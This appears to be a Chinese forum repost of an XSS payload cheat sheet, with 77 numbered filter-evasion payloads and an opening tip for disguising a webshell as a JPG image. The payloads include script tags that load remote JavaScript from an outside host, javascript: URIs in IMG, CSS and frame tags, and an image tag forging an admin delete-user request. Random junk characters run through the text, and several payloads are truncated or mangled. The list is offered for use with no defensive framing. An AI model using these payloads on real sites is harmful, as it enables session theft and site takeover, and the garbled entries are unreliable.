跨站图片shell
3 H% `8 K! S/ _/ A& fXSS跨站代码 <script>alert("")</script>: T$ M# w9 W, r2 `* y$ I
9 X2 {4 q3 S9 X9 @
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马5 D0 M- v9 H" K, F }) }
i" v( ~) B& `9 i% m# O) P2 K' Y
: A+ b. ^% A: X C2 X, \: R- @$ B$ ^1 h( h; U0 R. i2 e
1)普通的XSS JavaScript注入 J3 f; U$ l& y+ ?1 B9 L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( l% A: X7 E% _4 D/ P
/ b' S/ d, ]3 M0 @) d(2)IMG标签XSS使用JavaScript命令
$ e K# L2 Q0 q! V2 W* h) d+ z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ S2 @, e0 G- }
- n1 z" u! H M* b2 W6 ?6 }(3)IMG标签无分号无引号5 t. M/ |0 N n/ x2 ~8 L# c
<IMG SRC=javascript:alert(‘XSS’)>
7 H: n' O: T7 c$ u
0 m5 z5 n) z% t# ~" _% W(4)IMG标签大小写不敏感
5 U G5 P; l% v. f/ o<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 n5 u/ K! a' e+ x
8 z/ D, s" U5 N$ J8 O& j2 D/ w(5)HTML编码(必须有分号)- n4 y* n) a! v1 R- W
<IMG SRC=javascript:alert(“XSS”)>* W8 R6 K: O v
# K9 n. @% A' n% s. j; q2 J5 ?(6)修正缺陷IMG标签
" X) k* H( D& n9 E<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 {& A0 x+ @" R0 d. N; i8 m
0 V& z0 T1 ^! G(7)formCharCode标签(计算器)/ k/ k* c' i. u2 ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 k) s. q" i$ Y6 A2 |- I; R+ g3 z) _. e& u
(8)UTF-8的Unicode编码(计算器)5 i7 ?5 ?2 V3 v5 U1 ^* R
<IMG SRC=jav..省略..S')>$ i8 c/ r( \ a" r. }
! n/ z+ J3 C' G. ~ p(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
( h3 ~$ \" g& r# F<IMG SRC=jav..省略..S')>( |* a7 m/ Q6 {. D6 Q* x3 K
$ B5 q5 D) r! F; |9 u
(10)十六进制编码也是没有分号(计算器)
# n, U1 x l8 q<IMG SRC=java..省略..XSS')>, r r& s9 m/ A( X5 c2 c. ]
# n: P* v3 ^, i- \. f(11)嵌入式标签,将Javascript分开
, @: m1 W G4 R<IMG SRC=”jav ascript:alert(‘XSS’);”>. d6 L/ F7 p$ [6 {: s J; U w
( E0 X; d7 }3 o3 V7 w# i
(12)嵌入式编码标签,将Javascript分开) J2 Q% {6 I( N+ J
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 P1 W9 F5 ^* Q3 c7 s
1 Q* a1 x, f2 Y+ O3 |& U, w
(13)嵌入式换行符& A+ n3 V1 G; n3 x
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* R/ r: ~/ b3 A
0 r: s, g1 u- B; E5 d" d(14)嵌入式回车, b) \4 l$ d9 Q; \- B- w N/ v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' y0 }' ~& g# p- m
1 p* L3 _2 O1 {0 U8 [ R0 ~(15)嵌入式多行注入JavaScript,这是XSS极端的例子& J0 ^+ J5 y0 a' k$ o) D, T" H+ C0 J
<IMG SRC=”javascript:alert(‘XSS‘)”>
/ q( c6 S. ]0 G+ f
. C4 g' [7 p$ z4 p2 `(16)解决限制字符(要求同页面)
& K- n: ]; R: V* h3 Q<script>z=’document.’</script>
z& _/ l+ w5 {" v7 Q<script>z=z+’write(“‘</script>
2 P3 o0 x+ k! H) y<script>z=z+’<script’</script>
4 t6 ]( O; q# W1 p3 u<script>z=z+’ src=ht’</script>+ h3 Y% `5 I5 B4 [
<script>z=z+’tp://ww’</script>, {0 w2 S* g( {" h9 E
<script>z=z+’w.shell’</script>" v7 A" ~& ^4 e; H
<script>z=z+’.net/1.’</script>
2 p3 i! e$ x! `<script>z=z+’js></sc’</script>% J- b6 j, h/ i* c
<script>z=z+’ript>”)’</script>& y/ Y* o+ E& T, U
<script>eval_r(z)</script>
& G. v2 t8 Q, M3 T: s* {
9 ~8 ]% ~+ K+ |! X: Y) b9 @(17)空字符2 e _% D+ {9 E! w# i
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ w! ~& X7 I. k- K+ I
! G" E7 I+ T' B" l6 k8 K! a4 F(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
K) r3 G" L$ Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out; ?* _4 q0 G3 L @9 @1 B
! Q1 v) i) {+ \
(19)Spaces和meta前的IMG标签1 o) d9 K" a B6 r% H; @! ]
<IMG SRC=” javascript:alert(‘XSS’);”>
L4 v0 `! @ [, ?6 f* B6 S
1 A6 G5 W& S' Y( i7 D/ m3 w(20)Non-alpha-non-digit XSS
* h2 A3 `. Z6 N) u( P<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! i |. o% m+ }. Q, m _
2 Z7 Z) `6 d2 @2 I' v(21)Non-alpha-non-digit XSS to 20 ]2 }8 [8 L8 @6 B& U' F0 b
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- {( d8 a/ F4 L$ M/ v) E) v8 K3 A- z" B. x. q
(22)Non-alpha-non-digit XSS to 3
4 R9 ~& K }! t<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ ?2 A- A6 B1 r: ~. ^: K) W2 z/ i) k7 [1 S
(23)双开括号
9 P: J, }' C0 Z8 K, q/ q% P<<SCRIPT>alert(“XSS”);//<</SCRIPT>. v' V! q# A6 H! Y" j# A
8 |% E- b" u, ^(24)无结束脚本标记(仅火狐等浏览器). [ e, L' R8 i0 c4 X( Y) ~+ z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& ~2 S0 s [0 x* U* t. R6 J% r7 N5 v& Z2 d( h7 [2 ?5 N5 j$ |) @
(25)无结束脚本标记22 Z, V) r) _1 Q. u
<SCRIPT SRC=//3w.org/XSS/xss.js>+ L2 N7 k, H- V. ~+ T
, }$ g& J7 Y8 c: i
(26)半开的HTML/JavaScript XSS$ _1 U) C1 N+ `: S
<IMG SRC=”javascript:alert(‘XSS’)”! W0 j: {) |5 ?1 f
* j0 ~1 q3 h7 [+ W- @(27)双开角括号
q7 P5 D/ p' X0 k5 n9 F<iframe src=http://3w.org/XSS.html <* p4 U. ]/ J7 d8 K% \- r1 j/ U
1 m/ b# M* T, I% c
(28)无单引号 双引号 分号, Z3 t4 h. l3 S+ O- L0 w
<SCRIPT>a=/XSS/
& v3 M, R7 r" P* M: L- A$ Lalert(a.source)</SCRIPT>5 `! g7 Z0 U! b5 J2 ]: y; w
0 d: R0 Z8 [2 w/ O7 y/ |" U$ ?$ E(29)换码过滤的JavaScript
+ X6 B3 _0 |0 e! s b. l9 x\”;alert(‘XSS’);//
, B" K" M! Q8 E1 W& z' j: o8 H0 s* V- k5 W' g
(30)结束Title标签
: {8 P: W5 J2 R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>4 q9 d5 ^& _8 c$ q
4 O# S) Y. ~& q' K; ^(31)Input Image; S/ i9 w" @' {. G/ M
<INPUT SRC=”javascript:alert(‘XSS’);”>
c" i8 K0 F3 G
1 C# j6 _: b$ d5 }$ `# ? \(32)BODY Image) l b3 w5 ]1 ?7 Z# S
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- L7 r1 q! l6 U, c- r
$ }/ t1 W7 \6 Y$ i! W+ Y9 V(33)BODY标签$ \* L) r/ {& c0 q/ u- H( _: H
<BODY(‘XSS’)>- R& {" l8 U) k8 I% o! q
. R- I3 u0 G3 B' A(34)IMG Dynsrc
! ~3 O* `: @4 x" m$ P<IMG DYNSRC=”javascript:alert(‘XSS’)”>; F# ]* H$ K4 O9 h
8 u) a- X5 l- J: I(35)IMG Lowsrc4 W. h! l8 N3 A" @& v% Y% I+ e
<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 s$ d: ]& j% `. l- _
1 A. V+ O+ t8 z5 x
(36)BGSOUND
8 U$ i! E2 j# Z2 O0 e5 i<BGSOUND SRC=”javascript:alert(‘XSS’);”>* I y) m! m4 t" @, ]
3 Z: d) c% l: A: p( D
(37)STYLE sheet
; b4 N0 y% A3 p7 p% @<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& K2 P N' V5 a, y# b; y: }
9 G/ o+ ]/ H$ q0 K(38)远程样式表
% L$ s# {# ^/ S1 X9 C. i6 J<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, e7 E! k1 C6 H5 {- a. {- I n( Z1 \- D; R1 c! T- l& c
(39)List-style-image(列表式)
2 \5 W6 j# S7 p<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 o# n6 Y+ w i5 J: w0 s% K
; m& O4 E7 P! d/ K1 Q(40)IMG VBscript1 A4 Q! G& v) l- H2 k; f& J
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 ]9 q7 I1 W7 c4 b6 C9 S5 ]; t4 V- J! U) s \9 }
(41)META链接url
) N- b' \) N$ Q% |. H& ]<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 j$ M+ z- r5 F+ P/ j
5 T9 w% e. C4 B: C3 Y+ N) L(42)Iframe& k9 N' F+ G& Y* q. ~7 b ?
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>; F. w3 \$ R. n3 c% Y
(43)Frame1 G% h! D& G1 ~8 e% n
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. d6 r7 C i2 F* y% w+ j
' w6 T0 o2 K$ c1 _. A- s
(44)Table( b( F6 ]: N+ r" _' D6 v+ f9 M
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 D0 E1 R$ z4 ?6 ]
/ o2 _! b, {4 z; p$ s; v) u
(45)TD
& T4 W" }8 d- Q) t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- Q3 V# }) \1 n
3 I8 R/ i$ V( _8 L% s. o(46)DIV background-image( z5 }) D# N6 c/ x" c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; f0 y' i" P7 t0 C6 A% B( Z. ]3 `# @
$ @; Z9 v+ d6 z, K! y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. W- T4 d+ c t# X# l j<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>: k( N% Y4 ]& @6 C, y7 B8 R# W
$ f& |9 S, Y. q9 Q4 p% Z+ ~
(48)DIV expression M' U9 t. m- ^8 ?- B& y! s% Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, O+ S% F( `5 x. T
7 c+ @& O3 C, u) S- h! C(49)STYLE属性分拆表达1 \. Z, i2 y( O0 S s4 K, z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* H" J. x8 g1 W% U& [6 Q2 k' b
, ~8 j+ [% h3 Q; v4 u- v( B
(50)匿名STYLE(组成:开角号和一个字母开头)
! J. E0 z6 n4 o5 j8 q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* G+ M0 w! i' {& _& m4 u& v
9 w3 j4 n1 n1 b
(51)STYLE background-image
+ ~' K1 m6 a! A$ e7 S3 i9 h* }<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* M$ V7 S$ ^9 _2 D1 Z/ e( x; l3 O& w3 Z$ J6 K& A
(52)IMG STYLE方式
x" K; ]$ O0 U) L1 e7 jexppression(alert(“XSS”))’>6 D, m. c/ W) O* \9 G; r
! s3 H6 o6 Z. h(53)STYLE background/ P8 ]1 y$ \, F9 _; @7 b8 Q
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' b% q8 u+ z* S
' U P/ P/ U* n9 s( [(54)BASE
/ b, r+ p! b% ^3 D- v% b) K- S<BASE HREF=”javascript:alert(‘XSS’);//”>
3 K9 E- j7 m% h4 `) T" j3 w' Z! Y7 x, L t% {6 @0 `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS, Q# o) ]7 j, {/ _- \9 K
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 h3 N! i& n! |2 E0 L( M; d- s, R# p+ N
) \ ]( n1 N5 T J" M(56)在flash中使用ActionScrpt可以混进你XSS的代码$ L9 ~; B% Q4 f' k$ Y3 a! X
a=”get”;
~; o) }" ~9 T) x3 [- jb=”URL(\”";- X% o+ n/ \' L6 ^
c=”javascript:”;
3 @( k2 K t, kd=”alert(‘XSS’);\”)”;$ G. R, d1 {$ \/ w: j4 G% C
eval_r(a+b+c+d);
4 a* U# ?- m8 N* N" h: A8 {& n9 s: S! K
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上9 b9 B# R7 ]- X$ B
<HTML xmlns:xss>
: e+ a/ r1 R+ _7 q# l( N9 H4 b<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>1 @: h0 V: O% U$ Q1 i
<xss:xss>XSS</xss:xss>
; ~) {! r* O# x. w/ j</HTML>7 G$ {$ {% H+ b. |4 B
; n3 r4 t( M: a/ n(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& v7 O) V1 r' |6 i0 h; T: W' K
<SCRIPT SRC=””></SCRIPT>
3 k: g3 {4 P J' ^) S+ R' f, w q! \5 @
(59)IMG嵌入式命令,可执行任意命令7 a( z& m5 g+ }3 ^
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
- T H7 o+ c- t5 f
- Q: ?, L u' Z(60)IMG嵌入式命令(a.jpg在同服务器)
$ R- j& s; F4 s" S: a0 }Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) Q* m I/ U0 Q: u# F0 V* M5 `& ^
(61)绕符号过滤
7 r& X3 G. {8 M. f: |7 u' i<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 q3 n+ [0 J, ~$ k' X" T# g7 e: b1 j$ v& k7 b ]5 c
(62); S1 B) t: l6 x( t2 b5 \7 }. o9 P
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 Z4 B8 B3 R6 d" @7 w( ~# i
% D. G& Q6 \ Y. u1 Q8 Y, ](63)
" N% I8 i7 o" C. z; h<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; t! c+ z0 Y& R2 X8 G
3 I% p, G2 K9 o/ {, }. _(64)7 y3 Z! g+ K# C" P3 N
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>3 p/ [( C) x1 U% S8 d
0 m6 {- l# V/ s7 W6 m7 G+ k# H
(65)/ s' R$ M) O" W9 `9 t, m
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>& C5 O5 C2 d2 C% X! P, Z
3 r; y) G3 `( ?2 M(66)9 h2 k7 y3 L. |; h& ?
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ o8 @% b# T" R5 V4 C, k! _' X3 T# w+ E+ U y$ g
(67)
?& f6 c! h8 D/ Z* E<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>- {9 c/ G9 g* B2 R7 k. D, J
: C# ~. F5 l( P0 f d ^(68)URL绕行2 f' n5 F8 ~4 ~, O; ^' \: I; u
<A HREF=”http://127.0.0.1/”>XSS</A>' |" t/ c: p' e+ Y; j# Z9 q4 `
9 d9 K( R( ?: d2 G5 H5 y(69)URL编码" T3 v/ {; b3 T6 q2 c4 A
<A HREF=”http://3w.org”>XSS</A>* J" g2 S: H% f
4 \9 X7 P. f* s5 n0 D6 c7 u/ u
(70)IP十进制* \6 @ x& C, n
<A HREF=”http://3232235521″>XSS</A>
7 [, Q8 ~* K& @. W5 i' V) {1 u. Z5 p, @4 c+ D
(71)IP十六进制
6 T1 o' V, E5 y# O<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>; [* f8 D* w* Q4 p! ^
/ P* A$ ^6 |' m0 u) c
(72)IP八进制
1 T5 b" H# O* y# C' p6 ]( o* h<A HREF=”http://0300.0250.0000.0001″>XSS</A>' p% N: }' n& ]2 k% {
% H! j4 D3 U8 U i2 h; c
(73)混合编码
7 D& b" z5 b) h8 E6 p- W<A HREF=”h5 Y3 M* U7 p9 q/ T5 K- s
tt p://6 6.000146.0×7.147/”">XSS</A>/ U/ {( B4 {5 P* b. c( d& Y* n4 u
3 f) L# ~5 U. U
(74)节省[http:]; K5 s1 }3 @, y G: O+ x. D
<A HREF=”//www.google.com/”>XSS</A>% G& m5 e7 H$ w2 k4 V
1 I2 P4 _8 H4 r. z
(75)节省[www]
6 n7 ]* |8 C& ^9 j<A HREF=”http://google.com/”>XSS</A>
0 N" B. D& M9 y9 E5 T
8 r6 {, P+ ?1 J& ~8 L: n2 ]; a' e(76)绝对点绝对DNS6 m! G, }7 _. T/ C
<A HREF=”http://www.google.com./”>XSS</A>
1 e9 `) ~3 `' m! J& v" i8 E# U+ m. |, ] t$ _9 a: w
(77)javascript链接% p9 O( L. V/ [2 }4 k
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
) j4 D) P: |* h* d* W8 j9 ?7 D |